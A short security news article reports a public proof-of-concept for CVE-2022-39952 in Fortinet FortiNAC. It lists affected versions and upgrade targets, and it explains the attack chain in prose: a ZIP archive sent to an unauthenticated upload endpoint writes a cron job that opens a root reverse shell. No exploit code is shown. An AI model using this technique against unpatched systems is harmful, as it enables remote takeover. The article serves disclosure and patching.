Security researchers have released a proof-of-concept exploit for a critical vulnerability (CVE-2022-39952) in Fortinet’s FortiNAC network access control suite.
The vulnerability has been detected in FortiNAC versions 9.4.0, 9.2.0 through 9.2.5, 9.1.0 through 9.1.7, and all versions on the 8.8, 8.7, 8.6, 8.5, and 8.3 branches. To mitigate the risk, organizations that use these versions have been urged to apply the available security updates.
How the PoC exploit works and the implications for FortiNAC users
Recently, security researchers at Horizon3 cybersecurity company have released a technical post revealing how the vulnerability can be exploited. They have also provided proof-of-concept (PoC) exploit code on the company’s GitHub repository. The researchers explain that the exploit involves writing a cron job to /etc/cron.d/ that triggers every minute to initiate a root reverse shell to the attacker, giving them remote code execution capabilities.
The analysts at Horizon3 discovered that the fix for CVE-2022-39952 removed ‘keyUpload.jsp,’ an endpoint that parses requests for a ‘key’ parameter, writes it on a config file, and then executes a bash script, ‘configApplianceXml.’ The bash script executes the ‘unzip’ command on the newly written file, allowing any arbitrary file to be written.
Hence, an attacker can create a ZIP archive that contains the payload, specifying where it must be extracted, and then send it to the vulnerable endpoint using the key parameter. The reverse shell should be ready within a minute.
To protect against CVE-2022-39952, FortiNAC administrators should urgently upgrade their versions to 9.4.1 or higher, 9.2.6 and higher, 9.1.8 or higher, and 7.2+.